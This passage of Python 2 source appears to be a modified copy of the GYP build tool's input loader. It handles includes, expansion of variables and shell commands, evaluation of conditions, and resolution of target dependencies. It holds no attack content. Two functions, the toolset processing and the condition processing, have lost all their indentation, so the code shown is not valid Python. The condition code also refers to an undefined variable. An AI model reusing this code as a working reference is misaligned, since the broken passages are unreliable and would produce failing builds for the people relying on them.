  nested dicts and lists so 'includes' sections can appear at any depth.
  """
  includes_list = []
  # "is not None" (identity) instead of the original "!= None" equality test.
  if includes is not None:
    includes_list.extend(includes)
  if 'includes' in subdict:
    for include in subdict['includes']:
      # "include" is specified relative to subdict_path, so compute the real
      # path to include by appending the provided "include" to the directory
      # in which subdict_path resides.
      relative_include = \
          os.path.normpath(os.path.join(os.path.dirname(subdict_path), include))
      includes_list.append(relative_include)
    # Unhook the includes list, it's no longer needed.
    del subdict['includes']
  # Merge in the included files.
  for include in includes_list:
    if 'included' not in aux_data[subdict_path]:
      aux_data[subdict_path]['included'] = []
    aux_data[subdict_path]['included'].append(include)
    gyp.DebugOutput(gyp.DEBUG_INCLUDES, "Loading Included File: '%s'" % include)
    MergeDicts(subdict,
               LoadOneBuildFile(include, data, aux_data, variables, None,
                                False, check),
               subdict_path, include)
  # Recurse into subdictionaries.
  for k, v in subdict.iteritems():
    if v.__class__ == dict:
      LoadBuildFileIncludesIntoDict(v, subdict_path, data, aux_data, variables,
                                    None, check)
    elif v.__class__ == list:
      LoadBuildFileIncludesIntoList(v, subdict_path, data, aux_data, variables,
                                    check)
# This recurses into lists so that it can look for dicts.
def LoadBuildFileIncludesIntoList(sublist, sublist_path, data, aux_data,
                                  variables, check):
  """Descends through |sublist| looking for dicts that may carry includes.
  Lists themselves cannot have an 'includes' key; this only recurses into
  nested dicts (handled by LoadBuildFileIncludesIntoDict) and deeper lists.
  """
  for entry in sublist:
    entry_class = entry.__class__
    if entry_class == dict:
      LoadBuildFileIncludesIntoDict(entry, sublist_path, data, aux_data,
                                    variables, None, check)
    elif entry_class == list:
      LoadBuildFileIncludesIntoList(entry, sublist_path, data, aux_data,
                                    variables, check)
# Processes toolsets in all the targets. This recurses into condition entries
# since they can contain toolsets as well.
def ProcessToolsetsInDict(data):
if 'targets' in data:
target_list = data['targets']
new_target_list = []
for target in target_list:
global multiple_toolsets
if multiple_toolsets:
toolsets = target.get('toolsets', ['target'])
else:
toolsets = ['target']
if len(toolsets) > 0:
# Optimization: only do copies if more than one toolset is specified.
for build in toolsets[1:]:
new_target = copy.deepcopy(target)
new_target['toolset'] = build
new_target_list.append(new_target)
target['toolset'] = toolsets[0]
new_target_list.append(target)
data['targets'] = new_target_list
if 'conditions' in data:
for condition in data['conditions']:
if isinstance(condition, list):
for condition_dict in condition[1:]:
ProcessToolsetsInDict(condition_dict)
# TODO(mark): I don't love this name. It just means that it's going to load
# a build file that contains targets and is expected to provide a targets dict
# that contains the targets...
def LoadTargetBuildFile(build_file_path, data, aux_data, variables, includes,
                        depth, check):
  # Loads the target-bearing build file at build_file_path into |data|:
  # merges includes, records included_files, expands toolsets, applies
  # "pre"/"early" variable and condition processing, merges target_defaults
  # into each target, and recursively loads the build files of all
  # dependencies. Returns |data|.
  global absolute_build_file_paths
  # If depth is set, predefine the DEPTH variable to be a relative path from
  # this build file's directory to the directory identified by depth.
  if depth:
    # TODO(dglazkov) The backslash/forward-slash replacement at the end is a
    # temporary measure. This should really be addressed by keeping all paths
    # in POSIX until actual project generation.
    d = gyp.common.RelativePath(depth, os.path.dirname(build_file_path))
    if d == '':
      variables['DEPTH'] = '.'
    else:
      variables['DEPTH'] = d.replace('\\', '/')
  # If the generator needs absolute paths, then do so.
  if absolute_build_file_paths:
    build_file_path = os.path.abspath(build_file_path)
  if build_file_path in data['target_build_files']:
    # Already loaded.
    return
  data['target_build_files'].add(build_file_path)
  gyp.DebugOutput(gyp.DEBUG_INCLUDES,
                  "Loading Target Build File '%s'" % build_file_path)
  build_file_data = LoadOneBuildFile(build_file_path, data, aux_data, variables,
                                     includes, True, check)
  # Store DEPTH for later use in generators.
  build_file_data['_DEPTH'] = depth
  # Set up the included_files key indicating which .gyp files contributed to
  # this target dict.
  if 'included_files' in build_file_data:
    raise KeyError, build_file_path + ' must not contain included_files key'
  included = GetIncludedBuildFiles(build_file_path, aux_data)
  build_file_data['included_files'] = []
  for included_file in included:
    # included_file is relative to the current directory, but it needs to
    # be made relative to build_file_path's directory.
    included_relative = \
        gyp.common.RelativePath(included_file,
                                os.path.dirname(build_file_path))
    build_file_data['included_files'].append(included_relative)
  ProcessToolsetsInDict(build_file_data)
  # Apply "pre"/"early" variable expansions and condition evaluations.
  ProcessVariablesAndConditionsInDict(build_file_data, False, variables,
                                      build_file_path)
  # Look at each project's target_defaults dict, and merge settings into
  # targets.
  if 'target_defaults' in build_file_data:
    index = 0
    if 'targets' in build_file_data:
      while index < len(build_file_data['targets']):
        # This procedure needs to give the impression that target_defaults is
        # used as defaults, and the individual targets inherit from that.
        # The individual targets need to be merged into the defaults. Make
        # a deep copy of the defaults for each target, merge the target dict
        # as found in the input file into that copy, and then hook up the
        # copy with the target-specific data merged into it as the replacement
        # target dict.
        old_target_dict = build_file_data['targets'][index]
        new_target_dict = copy.deepcopy(build_file_data['target_defaults'])
        MergeDicts(new_target_dict, old_target_dict,
                   build_file_path, build_file_path)
        build_file_data['targets'][index] = new_target_dict
        index = index + 1
    else:
      raise Exception, \
            "Unable to find targets in build file %s" % build_file_path
    # No longer needed.
    del build_file_data['target_defaults']
  # Look for dependencies. This means that dependency resolution occurs
  # after "pre" conditionals and variable expansion, but before "post" -
  # in other words, you can't put a "dependencies" section inside a "post"
  # conditional within a target.
  if 'targets' in build_file_data:
    for target_dict in build_file_data['targets']:
      if 'dependencies' not in target_dict:
        continue
      for dependency in target_dict['dependencies']:
        other_build_file = \
            gyp.common.ResolveTarget(build_file_path, dependency, None)[0]
        try:
          LoadTargetBuildFile(other_build_file, data, aux_data, variables,
                              includes, depth, check)
        except Exception, e:
          gyp.common.ExceptionAppend(
              e, 'while loading dependencies of %s' % build_file_path)
          raise
  return data
# Look for the bracket that matches the first bracket seen in a
# string, and return the start and end as a tuple. For example, if
# the input is something like "<(foo <(bar)) blah", then it would
# return (1, 13), indicating the entire string except for the leading
# "<" and trailing " blah".
def FindEnclosingBracketGroup(input):
  """Finds the span of the bracket group opened by the first bracket seen.

  Looks for the bracket that matches the first open bracket ('{', '[' or
  '(') in |input| and returns (start, end) as a half-open index pair.  For
  example, for "<(foo <(bar)) blah" it returns (1, 13): the entire string
  except the leading "<" and trailing " blah".  Returns (-1, -1) on
  unbalanced or mismatched brackets.
  """
  brackets = { '}': '{',
               ']': '[',
               ')': '(', }
  stack = []
  start = -1
  # enumerate() replaces the original manually-maintained counter variable;
  # the index values are identical.
  for count, char in enumerate(input):
    if char in brackets.values():
      stack.append(char)
      if start == -1:
        start = count
    if char in brackets.keys():
      try:
        last_bracket = stack.pop()
      except IndexError:
        return (-1, -1)
      if last_bracket != brackets[char]:
        return (-1, -1)
      if len(stack) == 0:
        return (start, count + 1)
  return (-1, -1)
canonical_int_re = re.compile('^(0|-?[1-9][0-9]*)$')
def IsStrCanonicalInt(string):
  """Returns True if |string| is in its canonical integer form.
  The canonical form is such that str(int(string)) == string.
  """
  # Non-strings (including ints) are never canonical; otherwise defer to the
  # regex: zero, or a nonzero integer with no leading zeros.
  return isinstance(string, str) and canonical_int_re.match(string) is not None
# Regexes matching GYP variable/command references. The "early" form uses the
# '<' family (expanded before conditions), the "late" form the '>' family;
# named groups: 'replace' (full reference), 'type' (the <, <!, <|, <@, ...
# prefix), 'is_array' (contains '[' for command arrays), 'content' (variable
# name or command text).
early_variable_re = re.compile('(?P<replace>(?P<type><((!?@?)|\|)?)'
                               '\((?P<is_array>\s*\[?)'
                               '(?P<content>.*?)(\]?)\))')
late_variable_re = re.compile('(?P<replace>(?P<type>>((!?@?)|\|)?)'
                              '\((?P<is_array>\s*\[?)'
                              '(?P<content>.*?)(\]?)\))')
# Global cache of results from running commands so they don't have to be run
# more than once.
cached_command_results = {}
def FixupPlatformCommand(cmd):
  """Adapts a POSIX command for the host platform.

  On Windows, rewrites a leading 'cat ' into the equivalent 'type '.  |cmd|
  may be either a command string or an argv-style list (only the first
  element is rewritten).  Returns cmd unchanged on other platforms.
  """
  if sys.platform == 'win32':
    # isinstance() is the idiomatic type test (the original compared
    # type(cmd) == list, which rejects list subclasses).
    if isinstance(cmd, list):
      cmd = [re.sub('^cat ', 'type ', cmd[0])] + cmd[1:]
    else:
      cmd = re.sub('^cat ', 'type ', cmd)
  return cmd
def ExpandVariables(input, is_late, variables, build_file):
  # Expands GYP variable and command references in |input| and returns the
  # result. Uses the '<' family of references when is_late is False and the
  # '>' family when is_late is True. Handles command execution ('!'
  # variants), gyp-time file-list generation ('|' variants), and expansion
  # into list context ('@' variants). Strings that end up in canonical
  # integer form are converted to int before returning.
  # Look for the pattern that gets expanded into variables
  if not is_late:
    variable_re = early_variable_re
    expansion_symbol = '<'
  else:
    variable_re = late_variable_re
    expansion_symbol = '>'
  input_str = str(input)
  # Do a quick scan to determine if an expensive regex search is warranted.
  if expansion_symbol in input_str:
    # Get the entire list of matches as a list of MatchObject instances.
    # (using findall here would return strings instead of MatchObjects).
    matches = [match for match in variable_re.finditer(input_str)]
  else:
    matches = None
  output = input_str
  if matches:
    # Reverse the list of matches so that replacements are done right-to-left.
    # That ensures that earlier replacements won't mess up the string in a
    # way that causes later calls to find the earlier substituted text instead
    # of what's intended for replacement.
    matches.reverse()
    for match_group in matches:
      match = match_group.groupdict()
      gyp.DebugOutput(gyp.DEBUG_VARIABLES,
                      "Matches: %s" % repr(match))
      # match['replace'] is the substring to look for, match['type']
      # is the character code for the replacement type (< > <! >! <| >| <@
      # >@ <!@ >!@), match['is_array'] contains a '[' for command
      # arrays, and match['content'] is the name of the variable (< >)
      # or command to run (<! >!).
      # run_command is true if a ! variant is used.
      run_command = '!' in match['type']
      # file_list is true if a | variant is used.
      file_list = '|' in match['type']
      # Capture these now so we can adjust them later.
      replace_start = match_group.start('replace')
      replace_end = match_group.end('replace')
      # Find the ending paren, and re-evaluate the contained string.
      (c_start, c_end) = FindEnclosingBracketGroup(input_str[replace_start:])
      # Adjust the replacement range to match the entire command
      # found by FindEnclosingBracketGroup (since the variable_re
      # probably doesn't match the entire command if it contained
      # nested variables).
      replace_end = replace_start + c_end
      # Find the "real" replacement, matching the appropriate closing
      # paren, and adjust the replacement start and end.
      replacement = input_str[replace_start:replace_end]
      # Figure out what the contents of the variable parens are.
      contents_start = replace_start + c_start + 1
      contents_end = replace_end - 1
      contents = input_str[contents_start:contents_end]
      # Do filter substitution now for <|().
      # Admittedly, this is different than the evaluation order in other
      # contexts. However, since filtration has no chance to run on <|(),
      # this seems like the only obvious way to give them access to filters.
      if file_list:
        processed_variables = copy.deepcopy(variables)
        ProcessListFiltersInDict(contents, processed_variables)
        # Recurse to expand variables in the contents
        contents = ExpandVariables(contents, is_late,
                                   processed_variables, build_file)
      else:
        # Recurse to expand variables in the contents
        contents = ExpandVariables(contents, is_late, variables, build_file)
      # Strip off leading/trailing whitespace so that variable matches are
      # simpler below (and because they are rarely needed).
      contents = contents.strip()
      # expand_to_list is true if an @ variant is used. In that case,
      # the expansion should result in a list. Note that the caller
      # is to be expecting a list in return, and not all callers do
      # because not all are working in list context. Also, for list
      # expansions, there can be no other text besides the variable
      # expansion in the input string.
      expand_to_list = '@' in match['type'] and input_str == replacement
      if run_command or file_list:
        # Find the build file's directory, so commands can be run or file lists
        # generated relative to it.
        build_file_dir = os.path.dirname(build_file)
        if build_file_dir == '':
          # If build_file is just a leaf filename indicating a file in the
          # current directory, build_file_dir might be an empty string. Set
          # it to None to signal to subprocess.Popen that it should run the
          # command in the current directory.
          build_file_dir = None
        # Support <|(listfile.txt ...) which generates a file
        # containing items from a gyp list, generated at gyp time.
        # This works around actions/rules which have more inputs than will
        # fit on the command line.
        if file_list:
          if type(contents) == list:
            contents_list = contents
          else:
            contents_list = contents.split(' ')
          replacement = contents_list[0]
          path = replacement
          if not os.path.isabs(path):
            path = os.path.join(build_file_dir, path)
          f = gyp.common.WriteOnDiff(path)
          for i in contents_list[1:]:
            f.write('%s\n' % i)
          f.close()
        elif run_command:
          use_shell = True
          if match['is_array']:
            # A bracketed command is an argv-style list; evaluate the literal
            # and bypass the shell.
            contents = eval(contents)
            use_shell = False
          # Check for a cached value to avoid executing commands, or generating
          # file lists more than once.
          # TODO(http://code.google.com/p/gyp/issues/detail?id=112): It is
          # possible that the command being invoked depends on the current
          # directory. For that case the syntax needs to be extended so that the
          # directory is also used in cache_key (it becomes a tuple).
          # TODO(http://code.google.com/p/gyp/issues/detail?id=111): In theory,
          # someone could author a set of GYP files where each time the command
          # is invoked it produces different output by design. When the need
          # arises, the syntax should be extended to support no caching off a
          # command's output so it is run every time.
          cache_key = str(contents)
          cached_value = cached_command_results.get(cache_key, None)
          if cached_value is None:
            gyp.DebugOutput(gyp.DEBUG_VARIABLES,
                            "Executing command '%s' in directory '%s'" %
                            (contents,build_file_dir))
            # Fix up command with platform specific workarounds.
            contents = FixupPlatformCommand(contents)
            p = subprocess.Popen(contents, shell=use_shell,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE,
                                 stdin=subprocess.PIPE,
                                 cwd=build_file_dir)
            (p_stdout, p_stderr) = p.communicate('')
            if p.wait() != 0 or p_stderr:
              sys.stderr.write(p_stderr)
              # Simulate check_call behavior, since check_call only exists
              # in python 2.5 and later.
              raise Exception("Call to '%s' returned exit status %d." %
                              (contents, p.returncode))
            replacement = p_stdout.rstrip()
            cached_command_results[cache_key] = replacement
          else:
            gyp.DebugOutput(gyp.DEBUG_VARIABLES,
                            "Had cache value for command '%s' in directory '%s'" %
                            (contents,build_file_dir))
            replacement = cached_value
      else:
        if not contents in variables:
          raise KeyError, 'Undefined variable ' + contents + \
                ' in ' + build_file
        replacement = variables[contents]
      if isinstance(replacement, list):
        for item in replacement:
          if not isinstance(item, str) and not isinstance(item, int):
            raise TypeError, 'Variable ' + contents + \
                  ' must expand to a string or list of strings; ' + \
                  'list contains a ' + \
                  item.__class__.__name__
        # Run through the list and handle variable expansions in it. Since
        # the list is guaranteed not to contain dicts, this won't do anything
        # with conditions sections.
        ProcessVariablesAndConditionsInList(replacement, is_late, variables,
                                            build_file)
      elif not isinstance(replacement, str) and \
           not isinstance(replacement, int):
        raise TypeError, 'Variable ' + contents + \
              ' must expand to a string or list of strings; ' + \
              'found a ' + replacement.__class__.__name__
      if expand_to_list:
        # Expanding in list context. It's guaranteed that there's only one
        # replacement to do in |input_str| and that it's this replacement. See
        # above.
        if isinstance(replacement, list):
          # If it's already a list, make a copy.
          output = replacement[:]
        else:
          # Split it the same way sh would split arguments.
          output = shlex.split(str(replacement))
      else:
        # Expanding in string context.
        encoded_replacement = ''
        if isinstance(replacement, list):
          # When expanding a list into string context, turn the list items
          # into a string in a way that will work with a subprocess call.
          #
          # TODO(mark): This isn't completely correct. This should
          # call a generator-provided function that observes the
          # proper list-to-argument quoting rules on a specific
          # platform instead of just calling the POSIX encoding
          # routine.
          encoded_replacement = gyp.common.EncodePOSIXShellList(replacement)
        else:
          encoded_replacement = replacement
        output = output[:replace_start] + str(encoded_replacement) + \
                 output[replace_end:]
      # Prepare for the next match iteration.
      input_str = output
      # Look for more matches now that we've replaced some, to deal with
      # expanding local variables (variables defined in the same
      # variables block as this one).
      gyp.DebugOutput(gyp.DEBUG_VARIABLES,
                      "Found output %s, recursing." % repr(output))
      if isinstance(output, list):
        new_output = []
        for item in output:
          new_output.append(ExpandVariables(item, is_late, variables, build_file))
        output = new_output
      else:
        output = ExpandVariables(output, is_late, variables, build_file)
  # Convert all strings that are canonically-represented integers into integers.
  if isinstance(output, list):
    for index in xrange(0, len(output)):
      if IsStrCanonicalInt(output[index]):
        output[index] = int(output[index])
  elif IsStrCanonicalInt(output):
    output = int(output)
  gyp.DebugOutput(gyp.DEBUG_VARIABLES,
                  "Expanding %s to %s" % (repr(input), repr(output)))
  return output
def ProcessConditionsInDict(the_dict, is_late, variables, build_file):
# Process a 'conditions' or 'target_conditions' section in the_dict,
# depending on is_late. If is_late is False, 'conditions' is used.
#
# Each item in a conditions list consists of cond_expr, a string expression
# evaluated as the condition, and true_dict, a dict that will be merged into
# the_dict if cond_expr evaluates to true. Optionally, a third item,
# false_dict, may be present. false_dict is merged into the_dict if
# cond_expr evaluates to false.
#
# Any dict merged into the_dict will be recursively processed for nested
# conditionals and other expansions, also according to is_late, immediately
# prior to being merged.
if not is_late:
conditions_key = 'conditions'
else:
conditions_key = 'target_conditions'
if not conditions_key in the_dict:
return
conditions_list = the_dict[conditions_key]
# Unhook the conditions list, it's no longer needed.
del the_dict[conditions_key]
for condition in conditions_list:
if not isinstance(condition, list):
raise TypeError, conditions_key + ' must be a list'
if len(condition) != 2 and len(condition) != 3:
# It's possible that condition[0] won't work in which case this
# attempt will raise its own IndexError. That's probably fine.
raise IndexError, conditions_key + ' ' + condition[0] + \
' must be length 2 or 3, not ' + str(len(condition))
[cond_expr, true_dict] = condition[0:2]
false_dict = None
if len(condition) == 3:
false_dict = condition[2]
# Do expansions on the condition itself. Since the conditon can naturally
# contain variable references without needing to resort to GYP expansion
# syntax, this is of dubious value for variables, but someone might want to
# use a command expansion directly inside a condition.
cond_expr_expanded = ExpandVariables(cond_expr, is_late, variables,
build_file)
if not isinstance(cond_expr_expanded, str) and \
not isinstance(cond_expr_expanded, int):
raise ValueError, \
'Variable expansion in this context permits str and int ' + \
'only, found ' + expanded.__class__.__name__
try:
ast_code = compile(cond_expr_expanded, '<string>', 'eval')
if eval(ast_code, {'__builtins__': None}, variables):
merge_dict = true_dict
else:
merge_dict = false_dict
except SyntaxError, e:
syntax_error = SyntaxError('%s while evaluating condition \'%s\' in %s '
'at character %d.' %
(str(e.args[0]), e.text, build_file, e.offset),
e.filename, e.lineno, e.offset, e.text)
raise syntax_error
except NameError, e:
gyp.common.ExceptionAppend(e, 'while evaluating condition \'%s\' in %s' %
(cond_expr_expanded, build_file))
raise
if merge_dict != None:
# Expand variables and nested conditinals in the merge_dict before
# merging it.
ProcessVariablesAndConditionsInDict(merge_dict, is_late,
variables, build_file)
MergeDicts(the_dict, merge_dict, build_file, build_file)
def LoadAutomaticVariablesFromDict(variables, the_dict):
  # Any keys with string, int, or list values in the_dict become automatic
  # variables. The variable name is the key name with a "_" character
  # prepended. (Dict-valued keys are deliberately skipped.)
  for key, value in the_dict.iteritems():
    if isinstance(value, str) or isinstance(value, int) or \
       isinstance(value, list):
      variables['_' + key] = value
def LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key):
  """Loads the_dict's "variables" dict (if any) into |variables|.

  The variable name is the key name in the "variables" dict.  Variables
  that end with the % character are set only if they are unset in the
  variables dict.  the_dict_key is the name of the key that accesses
  the_dict in the_dict's parent dict.  If the_dict's parent is not a dict
  (it could be a list or it could be parentless because it is a root dict),
  the_dict_key will be None.
  """
  for key, value in the_dict.get('variables', {}).iteritems():
    if not isinstance(value, str) and not isinstance(value, int) and \
       not isinstance(value, list):
      continue
    if key.endswith('%'):
      variable_name = key[:-1]
      if variable_name in variables:
        # If the variable is already set, don't set it.
        continue
      # Bug fix: use "==" for string comparison; the original used
      # "the_dict_key is 'variables'", an identity test that only worked
      # because CPython happens to intern short string literals.
      if the_dict_key == 'variables' and variable_name in the_dict:
        # If the variable is set without a % in the_dict, and the_dict is a
        # variables dict (making |variables| a variables sub-dict of a
        # variables dict), use the_dict's definition.
        value = the_dict[variable_name]
    else:
      variable_name = key
    variables[variable_name] = value
def ProcessVariablesAndConditionsInDict(the_dict, is_late, variables_in,
                                        build_file, the_dict_key=None):
  """Handle all variable and command expansion and conditional evaluation.

  This function is the public entry point for all variable expansions and
  conditional evaluations.  The variables_in dictionary will not be modified
  by this function.

  Args:
    the_dict: dict to process; expanded and merged in place.
    is_late: phase flag forwarded to ExpandVariables and
        ProcessConditionsInDict (presumably selects early vs. late
        expansion -- confirm against those helpers).
    variables_in: variable bindings inherited from the enclosing scope;
        copied, never mutated.
    build_file: path of the build file that produced the_dict, used for
        relative paths and error messages.
    the_dict_key: key under which the_dict lives in its parent dict, or
        None when the parent is not a dict.
  """
  # Make a copy of the variables_in dict that can be modified during the
  # loading of automatics and the loading of the variables dict.
  variables = variables_in.copy()
  LoadAutomaticVariablesFromDict(variables, the_dict)

  if 'variables' in the_dict:
    # Make sure all the local variables are added to the variables
    # list before we process them so that you can reference one
    # variable from another.  They will be fully expanded by recursion
    # in ExpandVariables.
    for key, value in the_dict['variables'].iteritems():
      variables[key] = value

    # Handle the associated variables dict first, so that any variable
    # references within can be resolved prior to using them as variables.
    # Pass a copy of the variables dict to avoid having it be tainted.
    # Otherwise, it would have extra automatics added for everything that
    # should just be an ordinary variable in this scope.
    ProcessVariablesAndConditionsInDict(the_dict['variables'], is_late,
                                        variables, build_file, 'variables')

  LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)

  # Expand plain string values in place.
  for key, value in the_dict.iteritems():
    # Skip "variables", which was already processed if present.
    if key != 'variables' and isinstance(value, str):
      expanded = ExpandVariables(value, is_late, variables, build_file)
      if not isinstance(expanded, str) and not isinstance(expanded, int):
        raise ValueError, \
              'Variable expansion in this context permits str and int ' + \
              'only, found ' + expanded.__class__.__name__ + ' for ' + key
      the_dict[key] = expanded

  # Variable expansion may have resulted in changes to automatics.  Reload.
  # TODO(mark): Optimization: only reload if no changes were made.
  variables = variables_in.copy()
  LoadAutomaticVariablesFromDict(variables, the_dict)
  LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)

  # Process conditions in this dict.  This is done after variable expansion
  # so that conditions may take advantage of expanded variables.  For
  # example, if the_dict contains:
  #   {'type':       '<(library_type)',
  #    'conditions': [['_type=="static_library"', { ... }]]},
  # _type, as used in the condition, will only be set to the value of
  # library_type if variable expansion is performed before condition
  # processing.  However, condition processing should occur prior to
  # recursion so that variables (both automatic and "variables" dict type)
  # may be adjusted by conditions sections, merged into the_dict, and have
  # the intended impact on contained dicts.
  #
  # This arrangement means that a "conditions" section containing a
  # "variables" section will only have those variables effective in
  # subdicts, not in the_dict.  The workaround is to put a "conditions"
  # section within a "variables" section.  For example:
  #   {'conditions': [['os=="mac"', {'variables': {'define': 'IS_MAC'}}]],
  #    'defines':    ['<(define)'],
  #    'my_subdict': {'defines': ['<(define)']}},
  # will not result in "IS_MAC" being appended to the "defines" list in the
  # current scope but would result in it being appended to the "defines"
  # list within "my_subdict".  By comparison:
  #   {'variables': {'conditions': [['os=="mac"', {'define': 'IS_MAC'}]]},
  #    'defines':    ['<(define)'],
  #    'my_subdict': {'defines': ['<(define)']}},
  # will append "IS_MAC" to both "defines" lists.

  # Evaluate conditions sections, allowing variable expansions within them
  # as well as nested conditionals.  This will process a 'conditions' or
  # 'target_conditions' section, perform appropriate merging and recursive
  # conditional and variable processing, and then remove the conditions
  # section from the_dict if it is present.
  ProcessConditionsInDict(the_dict, is_late, variables, build_file)

  # Conditional processing may have resulted in changes to automatics or the
  # variables dict.  Reload.
  variables = variables_in.copy()
  LoadAutomaticVariablesFromDict(variables, the_dict)
  LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)

  # Recurse into child dicts, or process child lists which may result in
  # further recursion into descendant dicts.
  for key, value in the_dict.iteritems():
    # Skip "variables" and string values, which were already processed if
    # present.
    if key == 'variables' or isinstance(value, str):
      continue
    if isinstance(value, dict):
      # Pass a copy of the variables dict so that subdicts can't influence
      # parents.
      ProcessVariablesAndConditionsInDict(value, is_late, variables,
                                          build_file, key)
    elif isinstance(value, list):
      # The list itself can't influence the variables dict, and
      # ProcessVariablesAndConditionsInList will make copies of the variables
      # dict if it needs to pass it to something that can influence it.  No
      # copy is necessary here.
      ProcessVariablesAndConditionsInList(value, is_late, variables,
                                          build_file)
    elif not isinstance(value, int):
      raise TypeError, 'Unknown type ' + value.__class__.__name__ + \
                       ' for ' + key
def ProcessVariablesAndConditionsInList(the_list, is_late, variables,
                                        build_file):
  """Recursively expands variables and evaluates conditions in |the_list|.

  Dicts recurse into ProcessVariablesAndConditionsInDict, sublists recurse
  into this function, and string items are expanded in place (a string that
  expands to a list is spliced into the_list at its position).  Ints pass
  through untouched; any other item type raises TypeError.
  """
  # Iterate using an index so that new values can be assigned into the_list.
  index = 0
  while index < len(the_list):
    item = the_list[index]
    if isinstance(item, dict):
      # Make a copy of the variables dict so that it won't influence anything
      # outside of its own scope.
      ProcessVariablesAndConditionsInDict(item, is_late, variables,
                                          build_file)
    elif isinstance(item, list):
      ProcessVariablesAndConditionsInList(item, is_late, variables,
                                          build_file)
    elif isinstance(item, str):
      expanded = ExpandVariables(item, is_late, variables, build_file)
      if isinstance(expanded, (str, int)):
        the_list[index] = expanded
      elif isinstance(expanded, list):
        # Splice the expansion into the_list in place of the original item.
        del the_list[index]
        for expanded_item in expanded:
          the_list.insert(index, expanded_item)
          index = index + 1
        # index now identifies the next item to examine.  Continue right now
        # without falling into the index increment below.
        continue
      else:
        # Bug fix: index is an int; the old "+ index" concatenation raised
        # TypeError instead of this ValueError.  Convert with str().
        raise ValueError(
            'Variable expansion in this context permits strings and '
            'lists only, found ' + expanded.__class__.__name__ + ' at ' +
            str(index))
    elif not isinstance(item, int):
      # Same bug fix as above: stringify the index before concatenation.
      raise TypeError('Unknown type ' + item.__class__.__name__ +
                      ' at index ' + str(index))
    index = index + 1
def BuildTargetsDict(data):
  """Builds a dict mapping fully-qualified target names to their target dicts.

  |data| is a dict mapping loaded build files by pathname relative to the
  current directory.  Values in |data| are build file contents.  For each
  |data| value with a "targets" key, the value of the "targets" key is taken
  as a list containing target dicts.  Each target's fully-qualified name is
  constructed from the pathname of the build file (|data| key) and its
  "target_name" property.  These fully-qualified names are used as the keys
  in the returned dict.  These keys provide access to the target dicts,
  the dicts in the "targets" lists.
  """
  targets = {}
  for build_file in data['target_build_files']:
    for target in data[build_file].get('targets', []):
      qualified_name = gyp.common.QualifiedTarget(build_file,
                                                  target['target_name'],
                                                  target['toolset'])
      # Two targets may not share one fully-qualified name.
      if qualified_name in targets:
        raise KeyError('Duplicate target definitions for ' + qualified_name)
      targets[qualified_name] = target

  return targets
def QualifyDependencies(targets):
  """Make dependency links fully-qualified relative to the current directory.

  |targets| is a dict mapping fully-qualified target names to their target
  dicts.  For each target in this dict, keys known to contain dependency
  links are examined, and any dependencies referenced will be rewritten
  so that they are fully-qualified and relative to the current directory.
  All rewritten dependencies are suitable for use as keys to |targets| or a
  similar dict.
  """
  for target, target_dict in targets.iteritems():
    target_build_file = gyp.common.BuildFile(target)
    toolset = target_dict['toolset']
    # dependency_sections is presumably the module-level list of target-dict
    # keys that hold dependency links; 'dependencies' is among them (see the
    # cross-check below).
    for dependency_key in dependency_sections:
      dependencies = target_dict.get(dependency_key, [])
      for index in xrange(0, len(dependencies)):
        dep_file, dep_target, dep_toolset = gyp.common.ResolveTarget(
            target_build_file, dependencies[index], toolset)
        # NOTE(review): a mid-loop "global" statement is unusual but only
        # declares the name's scope; multiple_toolsets is read, not written,
        # here.
        global multiple_toolsets
        if not multiple_toolsets:
          # Ignore toolset specification in the dependency if it is
          # specified.
          dep_toolset = toolset
        dependency = gyp.common.QualifiedTarget(dep_file,
                                                dep_target,
                                                dep_toolset)
        # Rewrite the entry in place with the fully-qualified form.
        dependencies[index] = dependency

        # Make sure anything appearing in a list other than "dependencies"
        # also appears in the "dependencies" list.
        if dependency_key != 'dependencies' and \
           dependency not in target_dict['dependencies']:
          raise KeyError, 'Found ' + dependency + ' in ' + dependency_key + \
                          ' of ' + target + ', but not in dependencies'
def ExpandWildcardDependencies(targets, data):
  """Expands dependencies specified as build_file:*.

  For each target in |targets|, examines sections containing links to other
  targets.  If any such section contains a link of the form build_file:*, it
  is taken as a wildcard link, and is expanded to list each target in
  build_file.  The |data| dict provides access to build file dicts.

  Any target that does not wish to be included by wildcard can provide an
  optional "suppress_wildcard" key in its target dict.  When present and
  true, a wildcard dependency link will not include such targets.

  All dependency names, including the keys to |targets| and the values in
  each dependency list, must be qualified when this function is called.
  """
  for target, target_dict in targets.iteritems():
    toolset = target_dict['toolset']
    target_build_file = gyp.common.BuildFile(target)
    for dependency_key in dependency_sections:
      dependencies = target_dict.get(dependency_key, [])

      # Loop this way instead of "for dependency in" or "for index in xrange"
      # because the dependencies list will be modified within the loop body.
      index = 0
      while index < len(dependencies):
        (dependency_build_file, dependency_target, dependency_toolset) = \
            gyp.common.ParseQualifiedTarget(dependencies[index])
        if dependency_target != '*' and dependency_toolset != '*':
          # Not a wildcard.  Keep it moving.
          index = index + 1
          continue

        if dependency_build_file == target_build_file:
          # It's an error for a target to depend on all other targets in
          # the same file, because a target cannot depend on itself.
          raise KeyError, 'Found wildcard in ' + dependency_key + ' of ' + \
                          target + ' referring to same build file'

        # Take the wildcard out and adjust the index so that the next
        # dependency in the list will be processed the next time through the
        # loop.
        del dependencies[index]
        index = index - 1

        # Loop through the targets in the other build file, adding them to
        # this target's list of dependencies in place of the removed
        # wildcard.
        dependency_target_dicts = data[dependency_build_file]['targets']
        for dependency_target_dict in dependency_target_dicts:
          # int() coerces both booleans and "0"/"1"-style values.
          if int(dependency_target_dict.get('suppress_wildcard', False)):
            continue
          dependency_target_name = dependency_target_dict['target_name']
          # A target:* wildcard matches every target name; a toolset
          # wildcard matches every toolset.
          if (dependency_target != '*' and
              dependency_target != dependency_target_name):
            continue
          dependency_target_toolset = dependency_target_dict['toolset']
          if (dependency_toolset != '*' and
              dependency_toolset != dependency_target_toolset):
            continue
          dependency = gyp.common.QualifiedTarget(dependency_build_file,
                                                  dependency_target_name,
                                                  dependency_target_toolset)
          # Insert each expansion after the previous one, preserving the
          # other build file's target order.
          index = index + 1
          dependencies.insert(index, dependency)

        index = index + 1
class DependencyGraphNode(object):
  """A node in the target/build-file dependency graph.

  Attributes:
    ref: A reference to an object that this DependencyGraphNode represents.
    dependencies: List of DependencyGraphNodes on which this one depends.
